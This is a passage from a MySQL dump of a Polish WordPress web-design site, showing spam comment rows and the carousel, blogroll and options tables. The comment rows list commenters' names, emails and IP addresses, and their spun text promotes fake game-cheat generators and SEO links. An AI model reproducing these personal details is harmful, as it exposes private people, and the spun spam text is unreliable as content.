onej jest przeto niczym podstępnym.\r\n\r\n\r\nTo co jest krzywdzące, to jego nadmiar. A głębiej rzeką \r\nujmując zbytek \"kiepskiego cholesterolu\" wariantu LDL.\r\nPrzyjmuje się, że jego stężenie we posoki onym powinnaœ przekraczać 100 mg/dl.\r\nZ pozostałej pagin masz \"solidny cholesterol\" rodzaju HDL, którego stężenie onego powinieneœ przekraczać 50 mg/dl u œwiniarki \r\nnatomiast 40 mg/dl u mężczyzn. Całkowite stężenie \r\ncholesterolu w polskiej juchy winieneœ mieścić się w przedziale 114-200 mg/dl.\r\n\r\n\r\nJednak jeœliby te taryfy zostają przeroœnięte zaœ \r\nów poziom popiera się poprzez dłuższy okres, owe możesz spodziewać się \r\nrzetelnych trudów.\r\n\r\nDlatego onej zezwalaj do takiego stanu — dotrzymuj cholesterol na właściwym rządzie.\r\n\r\n\r\n\r\nHere is my web site - dieta na wysoki cholesterol',0,'spam','Mozilla/5.0 (X11; CrOS x86_64 6310.68.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.96 Safari/537.36','',0,0),(170,25,'Rusty','rustydotson@zoho.com','','155.133.19.52','2015-02-20 07:46:47','2015-02-20 07:46:47','Do you mind if I quote a few of your posts as long as \r\nI provide credit and sources back to your weblog? My blog is in the very same niche as yours and my visitors would truly benefit from a lot of the information you present here.\r\nPlease let me know if this okay with you. Thanks a lot!\r\n\r\n\r\nAlso visit my webpage :: bezpieczeństwo informacji',0,'spam','Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4','',0,0),(171,25,'Gerardo','gerardochandler@yahoo.de','','79.133.217.242','2015-03-04 18:15:57','2015-03-04 18:15:57','Ślub mianuje fundamentalne wydarzenie w większości społeczeństw.\r\nW skrajach europejskich pannica młoda oraz pan początkujący są egzaminowani poprzez osobę prowadzącą ceremonię, lub pragną uwzględnić małżeństwo – beż obopólnej harmonii \r\nmałżeństwo onymi może istnieć niezawarci.\r\nOboje muszą dopełniać określone kryteria sędziwe, aby ich \r\nharmonia egzystowała w zupełni świadoma. Publiczna tężyzna ślubu \r\naprobuje wszelkiemu penisowi społeczności na zgłoszenie sprzeciwu, jeżeli jego przeœwiadczeniem egzystują okoliczności uniemożliwiające zakorkowanie małżeństwa.\r\n\r\n\r\nAlso visit my weblog ślub',0,'spam','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','',0,0),(172,25,'Joann','joannjenson@bigstring.com','','78.11.5.124','2015-03-19 20:52:57','2015-03-19 20:52:57','I really like what you guys are usually up too. \r\nSuch clever work and coverage! Keep up the very good works guys I\'ve included you guys \r\nto our blogroll.\r\n\r\nAlso visit my website paznokcie3.unixstorm.org',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36','',0,0),(173,25,'Bernie','berniewestgarth@fmgirl.com','','202.29.235.130','2015-03-24 09:16:00','2015-03-24 09:16:00','Hi there, You\'ve performed an excellent job. I will definitely digg it and for my \r\npart suggest to my friends. I\'m sure they will be benefited from this web site.\r\n\r\n\r\nAlso visit my web blog BUY GoPro HERO4 SILVER AT AMAZON HERE',0,'spam','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Iron/29.0.1600.1 Chrome/29.0.1600.1 Safari/537.36','',0,0),(174,25,'Homer','homerosman@gmail.com','','104.224.28.19','2015-04-16 13:17:29','2015-04-16 13:17:29','It\'s not my first time to go to see this web page, i am visiting this website dailly and obtain nice data from here all \r\nthe time.\r\n\r\nStop by my page; jak trenowac na mase',0,'spam','Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.99 Safari/537.36','',0,0),(175,25,'Veronica','veronica_haines@yahoo.de','','8.18.122.91','2015-04-20 17:35:58','2015-04-20 17:35:58','Yߋu might use the gems and loose change generated by Hungry_shark_evolutіon cheats tool.\r\nSаntis states that you doo not need to hack an i - ОS \r\nsystem іllegally. Greece is wеll known for itѕ vacatiоn spots, as well as itѕ historʏ, but you might not tɦink thаt Greek has a unique internet zon tɦat you can gain ɑcess to with a \r\nGreek IP address.\r\n\r\nHеre is my web site - Fаst & Furіous: Legacy Hack Cheats (Terrence)',0,'spam','Mozilla/5.0 (iPad; CPU OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Mobile/12B440','',0,0),(176,25,'Declan','declan.hoke@zoho.com','','79.113.173.84','2015-05-10 20:30:11','2015-05-10 20:30:11','Fabuła zbliżona każdemu, rekomenduję literaturę Stron Www\r\n\r\nStop by my web site; komentarze (firmyw1miejscu.bloog.pl)',0,'spam','Mozilla/5.0 (Windows NT 5.1; rv:35.0) Gecko/20100101 Firefox/35.0','',0,0),(177,25,'Kristen','kristentarpley@inbox.com','','209.0.51.196','2015-06-08 14:39:05','2015-06-08 14:39:05','Sοny is seeking damagеs and an injunctive \r\nrelief, which woould blocҟ the sale of the devices. The eldеrly man tells \r\na vivid stօry about forgotten secrests buгied iin a temple,\r\nportals to undiscovered realms, and ɑ powerful \r\nBօok of Fate which controls the harmony within the adjoining worldѕ.\r\nWhen playing games like these, you are with the same people multiple times a week for hours and hours.\r\n\r\n\r\nAlso visіt my web bloǥ; Rival Kingԁoms: Age of Ruin hack unlimited coins generator (http://www.semquibdo.gov.co/?option=com_k2&view=itemlist&task=user&id=139279)',0,'spam','Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2220.0 Safari/537.36','',0,0),(178,25,'Vania','vaniarhoads@live.de','','8.18.122.42','2015-06-12 18:06:21','2015-06-12 18:06:21','It\'s ϲlear that tɦe bloggger didn\'t really undestand wha they read, \r\nbut wanted to make a similar post to get tгaffic to his site.\r\n\r\nIf the player needs to do something in a different area, the \r\nhіnt button will tell tthe player which directipn they need \r\nto go. Angel\'s ƿost also sҺows hhow Windοws 8 useгs can modify trial apps, ɡgiving them a full license, іncluding a waƴ to remove in-app ads.\r\n\r\n\r\n\r\nMy web-site WWE Immortals hack unlimited coins generator',0,'spam','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0 AlexaToolbar/alxf-2.21','',0,0),(179,25,'Alethea','aletheaalderson@arcor.de','','173.81.34.90','2015-06-15 00:13:34','2015-06-15 00:13:34','Hello there! Do you use Twitter? I\'d like to follow you if that \r\nwould be ok. I\'m absolutely enjoying your blog and look forward to new posts.\r\n\r\n\r\nAlso visit my web page moving companies - Homer -',0,'spam','Mozilla/5.0 (Windows NT 6.3; WOW64; rv:35.0) Gecko/20100101 Firefox/35.0','',0,0),(180,25,'Venus','venus_thomason@gmail.com','','117.167.8.146','2015-06-24 05:07:20','2015-06-24 05:07:20','Piece of writing writing is also a fun, if you be \r\nfamiliar with afterward you can write if not it is difficult to write.\r\n\r\n\r\nFeel free to visit my web-site; projekty stron internetowych',0,'spam','Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) CriOS/39.0.2171.50 Mobile/12B440 Safari/600.1.4','',0,0),(181,25,'Byron','byronmartinson@inbox.com','','192.171.243.120','2015-08-06 22:28:56','2015-08-06 22:28:56','Nice post. I was checking constantly this blog and I\'m \r\nimpressed! Very useful information particularly the last part :) I care for \r\nsuch info a lot. I was looking for this particular info for a long \r\ntime. Thank you and best of luck.\r\n\r\nMy site - strony internetowe manchester',0,'spam','Mozilla/5.0 (Windows NT 6.2; WOW64; rv:34.0) Gecko/20100101 Firefox/34.0','',0,0),(182,25,'Eva','evaelsberry@arcor.de','','5.157.14.159','2015-08-19 01:55:03','2015-08-19 01:55:03','I like the valuable information you provide in your articles.\r\nI will bookmark your blog and check again here regularly.\r\n\r\nI am quite sure I\'ll learn many new stuff right here!\r\nGood luck for the next!\r\n\r\nAlso visit my blog post :: lasertest',0,'spam','Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:34.0) Gecko/20100101 Firefox/34.0','',0,0),(183,25,'Halley','halleyormond@gmail.com','','192.161.190.17','2015-08-28 21:29:30','2015-08-28 21:29:30','These include decorating the car is reliable, comfortable rides, which of business your life.\r\n\r\nThese services are available in different loocations across thee board room holds for you.\r\nEvery esteemed wedding car decorations are also good transportation company iin Australia.\r\nWe strive for excellance and w ith your support and our prices depending oon their limousine clients.\r\n\r\n\r\nFeel free to surf to my blog - website - Ebony,',0,'spam','Mozilla/5.0 (Linux; Android 4.4.2; SM-G900F Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.93 Mobile Safari/537.36','',0,0),(184,25,'Arnoldo','arnoldotheriault@inbox.com','','104.144.172.214','2015-08-30 03:32:57','2015-08-30 03:32:57','WOW just what I was searching for. Came here by searching for pożyczki przez internet\r\n\r\nVisit my web site ... Pozyczaj, pozyczaj.blog.com,',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10.10; rv:34.0) Gecko/20100101 Firefox/34.0','',0,0),(185,25,'Nadine','nadine_macredie@gmail.com','','104.144.14.88','2015-09-08 23:41:51','2015-09-08 23:41:51','Great weblog here! Additionally your website a lot up very fast!\r\nWhat web host are you the usage of? Can I am getting your \r\nassociate link in your host? I wish my website loaded \r\nup as quickly as yours lol\r\n\r\nmy web site ... free castle clash hack',0,'spam','Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60','',0,0),(186,25,'Matt','mattstephensen@yahoo.com','','167.88.98.161','2015-09-14 06:39:17','2015-09-14 06:39:17','It\'s an amazing post for all the internet people; they will get \r\nbenefit from it I am sure.\r\n\r\nMy website: code promo la redoute transport gratuit',0,'spam','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36 OPR/26.0.1656.60','',0,0),(187,25,'Aline','alinebillings@t-online.de','','50.2.190.147','2015-09-16 15:19:06','2015-09-16 15:19:06','I used to be suggested this website by means of my cousin. I\'m not positive \r\nwhether this put up is written by him as no one else recognise such specific approximately my problem.\r\n\r\nYou\'re incredible! Thank you!\r\n\r\nMy web page ... Code Promo La Redoute Nouvelle Collection 2013',0,'spam','Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0','',0,0),(188,25,'wedding decorators in chennai|best wedding hall in chennai}','Kaldahl33363@hotmail.com','http://kalyanamandapam.directory/cat/stage-mandap-decorators/christian','74.91.23.94','2015-09-16 18:45:28','2015-09-16 18:45:28','Hello to all, how is the whole thing, I think every one is getting more from this website, and your views are fastidious in support of new viewers.|',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50','',0,0),(189,25,'Raquel','raquel_hopkins@gmail.com','','23.108.100.81','2015-10-19 14:57:41','2015-10-19 14:57:41','Εxcellent blog you\'ve got Һere.. It\'s difficult \r\nto find high-quality writing like yours these days. I Һonestly аppreciate individuals \r\nlikle you! Τake cаre!!\r\n\r\nHeгe is my blog http://hack-jeu.com (Sue)',0,'spam','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','',0,0),(190,25,'Jennie','bradfordlaycock@gmail.com','http://uaperfect.com/Forum/index.php?PHPSESSID=76d86ba823787cff5e9c48bae85ab7f0&action=profile;u=199046','83.23.86.223','2015-12-08 21:32:02','2015-12-08 21:32:02','Internetowe pozycjonowanie serwisów za darmo i \r\nZgodne ze standardem optymalizacja portali poradnik a Doskonała optymalizacja strony \r\npod katem wyszukiwarek and marketing internetowy sklep.\r\nInternetowe pozycjonowanie serwisów za darmo i \r\nZgodne ze standardem optymalizacja portali poradnik a Doskonała optymalizacja strony pod katem \r\nwyszukiwarek\r\nnie Raczej się umożliwić podekscytowanie wokół Twoje strona \r\ndie niższe . Zadedykuj sobie, aktualizujące Nie mniej niż kilka razy .\r\n\r\nJeśli nie , twój kibice zamiar naprawdę czują ignorowane i najprawdopodobniej nie \r\npodążać ty lub twoi towary tak namiętnie.\r\nJak najszybciej wdrożyć a strony, powinieneś być \r\npoświęcona jej konserwacja .Choć chcesz rynek swój Wyroby to powinien nie być jedynym Informacje że jest z pewnością obecny \r\nna Fb strona . Musisz Forum żadnej informacji że po prostu \r\nnaprawdę czują obowiązuje do Firma . Jeśli osoby czuję, że przynosi zysków jest twój tylko \r\ndocelową, będą one chcą pracować was.',0,'0','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','',0,0),(191,25,'Jonna Amie','Zhou@o2.pl','http://greennetdoradcy.com.pl','194.28.51.132','2016-02-04 23:53:31','2016-02-04 23:53:31','Would you be interested in exchanging links?',0,'spam','Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.50','',0,0); /*!40000 ALTER TABLE `w_comments` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_flash_image_carousel` -- DROP TABLE IF EXISTS `w_flash_image_carousel`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_flash_image_carousel` ( `id` mediumint(9) NOT NULL AUTO_INCREMENT, `row` tinytext NOT NULL, `folder` tinytext NOT NULL, `zoom` tinytext NOT NULL, `speed` tinytext NOT NULL, `onover` tinytext NOT NULL, `links` tinytext NOT NULL, `titles` tinytext NOT NULL, `vertical` tinytext NOT NULL, `target` tinytext NOT NULL, `transparency` tinytext NOT NULL, `width` tinytext NOT NULL, `height` tinytext NOT NULL, `imageslink` tinytext NOT NULL, PRIMARY KEY (`id`) ) ENGINE=MyISAM AUTO_INCREMENT=2 DEFAULT CHARSET=latin1; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_flash_image_carousel` -- LOCK TABLES `w_flash_image_carousel` WRITE; /*!40000 ALTER TABLE `w_flash_image_carousel` DISABLE KEYS */; INSERT INTO `w_flash_image_carousel` VALUES (1,'1','wp-content/plugins/flash-image-carousel/images/','1','1','1','','','0','_blank','0','100%','250px',''); /*!40000 ALTER TABLE `w_flash_image_carousel` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_links` -- DROP TABLE IF EXISTS `w_links`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_links` ( `link_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `link_url` varchar(255) NOT NULL DEFAULT '', `link_name` varchar(255) NOT NULL DEFAULT '', `link_image` varchar(255) NOT NULL DEFAULT '', `link_target` varchar(25) NOT NULL DEFAULT '', `link_description` varchar(255) NOT NULL DEFAULT '', `link_visible` varchar(20) NOT NULL DEFAULT 'Y', `link_owner` bigint(20) unsigned NOT NULL DEFAULT '1', `link_rating` int(11) NOT NULL DEFAULT '0', `link_updated` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `link_rel` varchar(255) NOT NULL DEFAULT '', `link_notes` mediumtext NOT NULL, `link_rss` varchar(255) NOT NULL DEFAULT '', PRIMARY KEY (`link_id`), KEY `link_visible` (`link_visible`) ) ENGINE=MyISAM AUTO_INCREMENT=12 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_links` -- LOCK TABLES `w_links` WRITE; /*!40000 ALTER TABLE `w_links` DISABLE KEYS */; INSERT INTO `w_links` VALUES (9,'http://www.bise.pl/','Strona o najlepszych polskich bankach','','','','Y',1,0,'0000-00-00 00:00:00','','',''),(8,'http://www.kredyciak.pl/','Strona o kredytach bez bik','','_blank','','Y',1,0,'0000-00-00 00:00:00','','',''),(10,'http://webol.pl/','Sprzedam portal internetowy','','','','Y',1,0,'0000-00-00 00:00:00','','',''),(11,'http://pozycjonowanie.blogan.pl/','Bezpieczne pozycjonowanie stron internetowych','','','','Y',1,0,'0000-00-00 00:00:00','','',''); /*!40000 ALTER TABLE `w_links` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `w_options` -- DROP TABLE IF EXISTS `w_options`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `w_options` ( `option_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT, `option_name` varchar(64) NOT NULL DEFAULT '', `option_value` longtext NOT NULL, `autoload` varchar(20) NOT NULL DEFAULT 'yes', PRIMARY KEY (`option_id`), UNIQUE KEY `option_name` (`option_name`) ) ENGINE=MyISAM AUTO_INCREMENT=29603 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `w_options` -- LOCK TABLES `w_options` WRITE; /*!40000 ALTER TABLE `w_options` DISABLE KEYS */; INSERT INTO `w_options` VALUES (1,'siteurl','http://www.pc-one.pl','yes'),(2,'blogname','Strony internetowe, tworzenie. Pozycjonowanie stron.','yes'),(3,'blogdescription','Zajmujemy się projektowaniem oraz tworzeniem tanich stron internetowych.','yes'),(4,'users_can_register','0','yes'),(5,'admin_email','admin@maxserwer.com','yes'),(6,'start_of_week','1','yes'),(7,'use_balanceTags','0','yes'),(8,'use_smilies','1','yes'),(9,'require_name_email','1','yes'),(10,'comments_notify','1','yes'),(11,'posts_per_rss','10','yes'),(12,'rss_use_excerpt','0','yes'),(13,'mailserver_url','mail.example.com','yes'),(14,'mailserver_login','login@example.com','yes'),(15,'mailserver_pass','password','yes'),(16,'mailserver_port','110','yes'),(17,'default_category','1','yes'),(18,'default_comment_status','open','yes'),(19,'default_ping_status','open','yes'),(20,'default_pingback_flag','1','yes'),(22,'posts_per_page','10','yes'),(23,'date_format','j F Y','yes'),(24,'time_format','H:i','yes'),(25,'links_updated_date_format','j F Y \\o H:i','yes'),(13824,'_transient_random_seed','ffdba77c54098397208ac60e88684d23','yes'),(29,'comment_moderation','','yes'),(30,'moderation_notify','1','yes'),(31,'permalink_structure','/%postname%/','yes'),(32,'gzipcompression','0','yes'),(33,'hack_file','0','yes'),(34,'blog_charset','UTF-8','yes'),(35,'moderation_keys','','no'),(36,'active_plugins','a:12:{i:0;s:43:\"all-in-one-seo-pack/all_in_one_seo_pack.php\";i:1;s:43:\"broken-link-checker/broken-link-checker.php\";i:2;s:36:\"google-sitemap-generator/sitemap.php\";i:3;s:39:\"link-juice-keeper/link-juice-keeper.php\";i:4;s:26:\"secure-wordpress/index.php\";i:5;s:59:\"simple-trackback-validation/simple-trackback-validation.php\";i:6;s:39:\"sitemap-generator/sitemap-generator.php\";i:7;s:32:\"statpress-reloaded/statpress.php\";i:8;s:29:\"widget-logic/widget_logic.php\";i:9;s:27:\"wp-pagenavi/wp-pagenavi.php\";i:10;s:27:\"wp-spamfree/wp-spamfree.php\";i:11;s:42:\"yet-another-related-posts-plugin/yarpp.php\";}','yes'),(37,'home','http://www.pc-one.pl','yes'),(38,'category_base','','yes'),(39,'ping_sites','http://rpc.pingomatic.com/','yes'),(40,'advanced_edit','0','yes'),(41,'comment_max_links','2','yes'),(42,'gmt_offset','0','yes'),(43,'default_email_category','1','yes'),(44,'recently_edited','a:4:{i:0;s:70:\"/var/www/clients/client7/web35/web/wp-content/themes/pc-one/footer.php\";i:2;s:70:\"/var/www/clients/client7/web35/web/wp-content/themes/pc-one/header.php\";i:3;s:69:\"/var/www/clients/client7/web35/web/wp-content/themes/pc-one/style.css\";i:4;s:0:\"\";}','no'),(45,'template','pc-one','yes'),(46,'stylesheet','pc-one','yes'),(47,'comment_whitelist','1','yes'),(48,'blacklist_keys','nofollow\r\nyou\r\nthank\r\nfacebook','no'),(49,'comment_registration','','yes'),(51,'html_type','text/html','yes'),(52,'use_trackback','0','yes'),(53,'default_role','subscriber','yes'),(54,'db_version','30135','yes'),(55,'uploads_use_yearmonth_folders','1','yes'),(56,'upload_path','','yes'),(57,'blog_public','1','yes'),(58,'default_link_category','2','yes'),(59,'show_on_front','posts','yes'),(60,'tag_base','','yes'),(61,'show_avatars','1','yes'),(62,'avatar_rating','G','yes'),(63,'upload_url_path','','yes'),(64,'thumbnail_size_w','150','yes'),(65,'thumbnail_size_h','150','yes'),(66,'thumbnail_crop','1','yes'),(67,'medium_size_w','300','yes'),(68,'medium_size_h','300','yes'),(69,'avatar_default','mystery','yes'),(72,'large_size_w','1024','yes'),(73,'large_size_h','1024','yes'),(74,'image_default_link_type','file','yes'),(75,'image_default_size','','yes'),(76,'image_default_align','','yes'),(77,'close_comments_for_old_posts','','yes'),(78,'close_comments_days_old','14','yes'),(79,'thread_comments','1','yes'),(80,'thread_comments_depth','5','yes'),(81,'page_comments','','yes'),(82,'comments_per_page','50','yes'),(83,'default_comments_page','newest','yes'),(84,'comment_order','asc','yes'),(85,'sticky_posts','a:0:{}','yes'),(86,'widget_categories','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(87,'widget_text','a:4:{i:2;a:0:{}i:3;a:3:{s:5:\"title\";s:0:\"\";s:4:\"text\";s:0:\"\";s:6:\"filter\";b:0;}i:4;a:3:{s:5:\"title\";s:7:\"Kontakt\";s:4:\"text\";s:23:\"webmaster@maxserwer.com\";s:6:\"filter\";b:0;}s:12:\"_multiwidget\";i:1;}','yes'),(88,'widget_rss','a:2:{i:2;a:0:{}s:12:\"_multiwidget\";i:1;}','yes'),(89,'timezone_string','','yes'),(91,'embed_size_w','','yes'),(92,'embed_size_h','600','yes'),(93,'page_for_posts','0','yes'),(94,'page_on_front','0','yes'),(95,'default_post_format','0','yes'),(96,'w_user_roles','a:5:{s:13:\"administrator\";a:2:{s:4:\"name\";s:13:\"Administrator\";s:12:\"capabilities\";a:62:{s:13:\"switch_themes\";b:1;s:11:\"edit_themes\";b:1;s:16:\"activate_plugins\";b:1;s:12:\"edit_plugins\";b:1;s:10:\"edit_users\";b:1;s:10:\"edit_files\";b:1;s:14:\"manage_options\";b:1;s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:6:\"import\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:8:\"level_10\";b:1;s:7:\"level_9\";b:1;s:7:\"level_8\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;s:12:\"delete_users\";b:1;s:12:\"create_users\";b:1;s:17:\"unfiltered_upload\";b:1;s:14:\"edit_dashboard\";b:1;s:14:\"update_plugins\";b:1;s:14:\"delete_plugins\";b:1;s:15:\"install_plugins\";b:1;s:13:\"update_themes\";b:1;s:14:\"install_themes\";b:1;s:11:\"update_core\";b:1;s:10:\"list_users\";b:1;s:12:\"remove_users\";b:1;s:9:\"add_users\";b:1;s:13:\"promote_users\";b:1;s:18:\"edit_theme_options\";b:1;s:13:\"delete_themes\";b:1;s:6:\"export\";b:1;}}s:6:\"editor\";a:2:{s:4:\"name\";s:6:\"Editor\";s:12:\"capabilities\";a:34:{s:17:\"moderate_comments\";b:1;s:17:\"manage_categories\";b:1;s:12:\"manage_links\";b:1;s:12:\"upload_files\";b:1;s:15:\"unfiltered_html\";b:1;s:10:\"edit_posts\";b:1;s:17:\"edit_others_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:10:\"edit_pages\";b:1;s:4:\"read\";b:1;s:7:\"level_7\";b:1;s:7:\"level_6\";b:1;s:7:\"level_5\";b:1;s:7:\"level_4\";b:1;s:7:\"level_3\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:17:\"edit_others_pages\";b:1;s:20:\"edit_published_pages\";b:1;s:13:\"publish_pages\";b:1;s:12:\"delete_pages\";b:1;s:19:\"delete_others_pages\";b:1;s:22:\"delete_published_pages\";b:1;s:12:\"delete_posts\";b:1;s:19:\"delete_others_posts\";b:1;s:22:\"delete_published_posts\";b:1;s:20:\"delete_private_posts\";b:1;s:18:\"edit_private_posts\";b:1;s:18:\"read_private_posts\";b:1;s:20:\"delete_private_pages\";b:1;s:18:\"edit_private_pages\";b:1;s:18:\"read_private_pages\";b:1;}}s:6:\"author\";a:2:{s:4:\"name\";s:6:\"Author\";s:12:\"capabilities\";a:10:{s:12:\"upload_files\";b:1;s:10:\"edit_posts\";b:1;s:20:\"edit_published_posts\";b:1;s:13:\"publish_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_2\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;s:22:\"delete_published_posts\";b:1;}}s:11:\"contributor\";a:2:{s:4:\"name\";s:11:\"Contributor\";s:12:\"capabilities\";a:5:{s:10:\"edit_posts\";b:1;s:4:\"read\";b:1;s:7:\"level_1\";b:1;s:7:\"level_0\";b:1;s:12:\"delete_posts\";b:1;}}s:10:\"subscriber\";a:2:{s:4:\"name\";s:10:\"Subscriber\";s:12:\"capabilities\";a:2:{s:4:\"read\";b:1;s:7:\"level_0\";b:1;}}}','yes'),(97,'widget_search','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(98,'widget_recent-posts','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(99,'widget_recent-comments','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(100,'widget_archives','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(101,'widget_meta','a:1:{s:12:\"_multiwidget\";i:1;}','yes'),(102,'sidebars_widgets','a:3:{s:19:\"wp_inactive_widgets\";a:10:{i:0;s:7:\"pages-2\";i:1;s:10:\"calendar-2\";i:2;s:7:\"links-2\";i:3;s:6:\"text-2\";i:4;s:5:\"rss-2\";i:5;s:11:\"tag_cloud-2\";i:6;s:10:\"nav_menu-2\";i:7;s:14:\"yarpp_widget-2\";i:8;s:6:\"text-3\";i:9;s:7:\"links-3\";}s:9:\"sidebar-1\";a:3:{i:0;s:7:\"pages-3\";i:1;s:7:\"links-4\";i:2;s:6:\"text-4\";}s:13:\"array_version\";i:3;}','yes'),(103,'cron','a:9:{i:1472742548;a:1:{s:20:\"blc_cron_check_links\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1472743503;a:1:{s:25:\"swpa_cleanup_live_traffic\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:6:\"hourly\";s:4:\"args\";a:0:{}s:8:\"interval\";i:3600;}}}i:1472764322;a:3:{s:16:\"wp_version_check\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:17:\"wp_update_plugins\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}s:16:\"wp_update_themes\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:10:\"twicedaily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:43200;}}}i:1472767370;a:1:{s:21:\"swpa_check_user_admin\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:2:\"8h\";s:4:\"args\";a:0:{}s:8:\"interval\";i:28800;}}}i:1472804802;a:1:{s:13:\"sm_ping_daily\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1472807915;a:1:{s:19:\"wp_scheduled_delete\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1472825353;a:2:{s:28:\"blc_cron_email_notifications\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}s:19:\"blc_cron_check_news\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:5:\"daily\";s:4:\"args\";a:0:{}s:8:\"interval\";i:86400;}}}i:1473401353;a:1:{s:29:\"blc_cron_database_maintenance\";a:1:{s:32:\"40cd750bba9870f18aada2478b24840a\";a:3:{s:8:\"schedule\";s:9:\"bimonthly\";s:4:\"args\"